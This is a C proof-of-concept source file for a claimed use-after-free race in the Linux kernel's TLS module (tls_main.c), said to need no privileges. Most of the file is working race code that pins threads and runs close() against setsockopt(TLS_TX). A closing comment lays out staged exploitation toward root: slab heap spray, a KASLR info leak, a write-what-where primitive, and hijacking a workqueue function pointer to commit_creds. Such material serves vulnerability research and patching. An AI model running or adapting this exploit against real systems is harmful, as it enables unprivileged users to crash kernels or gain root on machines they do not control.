/*
 * poc-tls-uaf-race.c
 *
 * Use-After-Free PoC: TOCTOU race in tls_sk_proto_close()
 * Kernel: Linux 7.1-rc3 (also present in stable 6.x/5.x branches)
 * File:   net/tls/tls_main.c
 *
 * ─── ROOT CAUSE ──────────────────────────────────────────────────────────────
 *
 * tls_sk_proto_close() reads ctx->tx_conf at line 372 WITHOUT holding lock_sock:
 *
 *   L372:  if (ctx->tx_conf == TLS_SW)        // UNLOCKED READ  ← bug
 *   L373:      tls_sw_cancel_work_tx(ctx);     // skipped when race wins
 *   L375:  lock_sock(sk);                      // too late
 *   ...
 *   L389:  if (ctx->tx_conf == TLS_SW)         // second read, now sees TLS_SW
 *   L390:      tls_sw_free_ctx_tx(ctx);        // kfree(tls_sw_context_tx)
 *
 * Concurrent setsockopt(SOL_TLS, TLS_TX) sets ctx->tx_conf = TLS_SW at line 758
 * INSIDE lock_sock.  If setsockopt wins the window [L372 .. L375]:
 *
 *   - tls_sw_cancel_work_tx() is SKIPPED  → BIT_TX_CLOSING never set,
 *     disable_delayed_work_sync() never called
 *   - tls_sw_free_ctx_tx() IS called      → kfree(tls_sw_context_tx)
 *   - tx_work_handler fires 1 jiffy later → accesses freed memory (UAF)
 *
 * ─── UAF READ/WRITE SITES ────────────────────────────────────────────────────
 *
 * tx_work_handler (tls_sw.c:2637):
 *   L2649:  test_bit(BIT_TX_CLOSING, &ctx->tx_bitmask)      UAF read
 *   L2653:  test_and_clear_bit(BIT_TX_SCHEDULED, ...)        UAF read/write
 *   L2658:  tls_tx_records(sk, -1)  — traverses ctx->tx_list UAF read
 *
 * tls_encrypt_done (tls_sw.c:467):
 *   L497:   ctx->async_wait.err = err                        UAF write
 *   L521:   atomic_dec_and_test(&ctx->encrypt_pending)       UAF read/write
 *   L522:   complete(&ctx->async_wait.completion)            UAF write
 *
 * ─── PRIVILEGES ──────────────────────────────────────────────────────────────
 * No root, no CAP_NET_ADMIN.  Any user with a TCP socket.
 *
 * ─── DETECTION ───────────────────────────────────────────────────────────────
 * Build kernel with CONFIG_KASAN=y CONFIG_KASAN_INLINE=y.
 * After running the PoC:
 *   sudo dmesg | grep -A 40 "BUG: KASAN: use-after-free"
 *
 * ─── BUILD ───────────────────────────────────────────────────────────────────
 *   gcc -O2 -lpthread -o poc-tls-uaf-race poc-tls-uaf-race.c
 *
 * ─── RUN ─────────────────────────────────────────────────────────────────────
 *   sudo modprobe tls          # ensure TLS ULP is loaded
 *   ./poc-tls-uaf-race
 *   sudo dmesg | tail -60
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <linux/tls.h>
#include <arpa/inet.h>

/* ── tunables ── */
#define RACE_PORT    0x4242
#define RACE_ITER    100000   /* iterations; ~thousands needed to win the race */
#define CPU_CLOSE    0        /* CPU for the close() racer */
#define CPU_SETOPT   1        /* CPU for the setsockopt() racer */

/* ── TLS 1.2 AES-GCM-128 crypto info — all-zero keys trigger the race
 *    without requiring valid ciphertext; setsockopt still reaches line 758 ── */
static const struct tls12_crypto_info_aes_gcm_128 tls_info = {
    .info = {
        .version    = TLS_1_2_VERSION,
        .cipher_type = TLS_CIPHER_AES_GCM_128,
    },
    /* iv, key, salt, rec_seq — zero-initialized */
};

/* ── shared per-iteration state ── */
struct iter_state {
    int fd;                 /* the racing file descriptor */
    pthread_barrier_t bar; /* start barrier: both threads wait here */
};

static int g_listen_fd = -1;

/* ────────────────────────────────────────────────────────────────────────────
 * Server thread: accepts and immediately discards connections.
 * We only need the client side to be in TCP_ESTABLISHED.
 * ──────────────────────────────────────────────────────────────────────────── */
static void *srv_thread(void *arg)
{
    (void)arg;
    for (;;) {
        int fd = accept(g_listen_fd, NULL, NULL);
        if (fd < 0) break;
        close(fd);
    }
    return NULL;
}

/* ────────────────────────────────────────────────────────────────────────────
 * Racer A: close(fd)
 *
 * Triggers:
 *   tls_sk_proto_close(sk)
 *     L372: READ ctx->tx_conf   ← race window starts here
 *     L375: lock_sock(sk)       ← race window ends here
 * ──────────────────────────────────────────────────────────────────────────── */
static void *racer_close(void *arg)
{
    struct iter_state *s = arg;
    pthread_barrier_wait(&s->bar);
    close(s->fd);
    return NULL;
}

/* ────────────────────────────────────────────────────────────────────────────
 * Racer B: setsockopt(fd, SOL_TLS, TLS_TX, ...)
 *
 * Triggers:
 *   do_tls_setsockopt_conf(sk, TLS_TX, ...)
 *     lock_sock(sk)              ← acquires the lock
 *     tls_set_sw_offload(sk, 1)  ← sets up AEAD, may start async encrypt
 *     ctx->tx_conf = TLS_SW      ← tls_main.c:758
 *     release_sock(sk)
 *
 * If this runs while Racer A is between L372 and L375:
 *   - Racer A saw TLS_BASE at L372 → skipped cancel_work_tx
 *   - Racer A at L390 sees TLS_SW → calls kfree(tls_sw_context_tx)
 *   - Delayed tx_work (scheduled 1 jiffy later by tls_encrypt_done) fires
 *     on the freed chunk → USE AFTER FREE
 * ──────────────────────────────────────────────────────────────────────────── */
static void *racer_setsockopt(void *arg)
{
    struct iter_state *s = arg;
    pthread_barrier_wait(&s->bar);
    setsockopt(s->fd, SOL_TLS, TLS_TX, &tls_info, sizeof(tls_info));
    /* errno EBADF is expected if Racer A won — fd was closed first */
    return NULL;
}

/* ── helpers ── */

static void pin_thread(pthread_t thr, int cpu)
{
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    pthread_setaffinity_np(thr, sizeof(set), &set);
}

static int setup_listen(int port)
{
    struct sockaddr_in addr = {
        .sin_family      = AF_INET,
        .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
        .sin_port        = htons(port),
    };
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) { perror("socket"); return -1; }
    int one = 1;
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) ||
        listen(fd, SOMAXCONN)) { perror("bind/listen"); return -1; }
    return fd;
}

static int tcp_connect(int port)
{
    struct sockaddr_in addr = {
        .sin_family      = AF_INET,
        .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
        .sin_port        = htons(port),
    };
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        close(fd); return -1;
    }
    return fd;
}

/* ── main ── */

int main(void)
{
    printf("╔══════════════════════════════════════════════════════════════╗\n");
    printf("║  net/tls TOCTOU UAF PoC — Linux 7.1-rc3                    ║\n");
    printf("║  Bug: tls_main.c:372 reads tx_conf without lock_sock        ║\n");
    printf("╚══════════════════════════════════════════════════════════════╝\n\n");

    g_listen_fd = setup_listen(RACE_PORT);
    if (g_listen_fd < 0) return 1;

    pthread_t srv;
    pthread_create(&srv, NULL, srv_thread, NULL);

    int tls_ok = 0;

    for (int i = 0; i < RACE_ITER; i++) {

        /* 1. Fresh TCP connection */
        int fd = tcp_connect(RACE_PORT);
        if (fd < 0) continue;

        /* 2. Attach TLS ULP — at this point ctx->tx_conf = TLS_BASE */
        if (setsockopt(fd, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0) {
            if (!tls_ok && (errno == ENOENT || errno == ENOPROTOOPT)) {
                fprintf(stderr,
                    "[!] TLS ULP unavailable. Run:  sudo modprobe tls\n");
                close(fd);
                break;
            }
            close(fd);
            continue;
        }
        tls_ok = 1;

        /*
         * 3. Race:
         *    Thread A: close(fd)               → tls_sk_proto_close
         *    Thread B: setsockopt(fd, TLS_TX)  → sets tx_conf = TLS_SW
         *
         *    Win condition: Thread A reads tx_conf=TLS_BASE at L372,
         *    then Thread B sets tx_conf=TLS_SW, then Thread A grabs
         *    lock_sock at L375 and sees tx_conf=TLS_SW at L389 → kfree.
         *    Delayed tx_work_handler fires on freed ctx → UAF.
         */
        struct iter_state state = { .fd = fd };
        pthread_barrier_init(&state.bar, NULL, 2);

        pthread_t ta, tb;
        pthread_create(&ta, NULL, racer_close,    &state);
        pthread_create(&tb, NULL, racer_setsockopt, &state);

        /* Pin to separate CPUs — maximises concurrency, widens race window */
        pin_thread(ta, CPU_CLOSE);
        pin_thread(tb, CPU_SETOPT);

        pthread_join(ta, NULL);
        pthread_join(tb, NULL);
        pthread_barrier_destroy(&state.bar);

        if (i % 5000 == 0 && i > 0)
            printf("[%6d / %d] races attempted — check dmesg\n", i, RACE_ITER);
    }

    printf("\n[done] %d iterations complete.\n", RACE_ITER);
    printf("\nTo check for UAF (requires CONFIG_KASAN=y kernel):\n");
    printf("  sudo dmesg | grep -A 40 'BUG: KASAN: use-after-free'\n\n");
    printf("Expected KASAN report sites:\n");
    printf("  net/tls/tls_sw.c:%d  tx_work_handler — test_bit(BIT_TX_CLOSING)\n", 2649);
    printf("  net/tls/tls_sw.c:%d  tx_work_handler — tls_tx_records()\n", 2658);
    printf("  net/tls/tls_sw.c:%d  tls_encrypt_done — ctx->async_wait.err write\n", 497);

    close(g_listen_fd);
    pthread_cancel(srv);
    pthread_join(srv, NULL);
    return 0;
}

/*
 * ─── EXPLOITATION NOTES ──────────────────────────────────────────────────────
 *
 * Stage 1 — UAF primitive acquisition
 *   Win the race above.  tls_sw_context_tx (~168 bytes, kmalloc-256 slab)
 *   is freed while tx_work_handler still holds a work_struct pointer to it.
 *
 * Stage 2 — Heap reclaim (cross-cache spray)
 *   Allocate kmalloc-256 objects from user space before tx_work_handler fires:
 *     • msg_msg (sendmsg with msgsz ≤ 256-sizeof(struct msg_msg))
 *     • pipe_buffer (pipe with PAGE_SIZE chunk)
 *     • sk_buff head (alloc_skb with small data)
 *   Fill the reclaimed chunk with controlled bytes.
 *
 * Stage 3a — Info leak
 *   tx_work_handler reads ctx->tx_bitmask (offset +0x98).
 *   tls_encrypt_done reads ctx->async_wait.completion (offset +0x10).
 *   If the reclaimed chunk contains a kernel pointer placed by the spray
 *   object, reading it via a shared BPF map or /proc gives KASLR defeat.
 *
 * Stage 3b — Arbitrary write
 *   complete() in tls_encrypt_done performs:
 *     swait_active(&x->wait) check → wake_up_process(wait->task)
 *   If the reclaimed chunk's offset +0x18 (swait_queue_head.task_list.next)
 *   points to a controlled task_struct pointer, wake_up_process writes
 *   to controlled memory → write-what-where primitive.
 *
 * Stage 3c — Function pointer hijack (full LPE)
 *   After kfree, tx_work_handler reschedules via:
 *     schedule_delayed_work(&ctx->tx_work.work, msecs_to_jiffies(10))
 *   ctx->tx_work.work is a struct delayed_work.  Its embedded work_struct
 *   contains a work_func_t func pointer (offset 0x00 in work_struct).
 *   Spray the freed 256-byte slab slot such that offset 0x00 holds a
 *   controlled kernel address (e.g., commit_creds(prepare_kernel_cred(0))).
 *   When schedule_delayed_work is called on the freed-and-reclaimed chunk,
 *   the workqueue calls that function → privileged code execution →
 *   uid/gid = 0 → root shell.
 *
 * ─── AFFECTED STABLE KERNELS ─────────────────────────────────────────────────
 *   The unlocked read at tls_main.c:372 (or equivalent line in older trees)
 *   appears in all kernels with CONFIG_TLS since ~v4.13.  Check:
 *     git log --all -S 'tls_sw_cancel_work_tx' net/tls/tls_main.c
 */
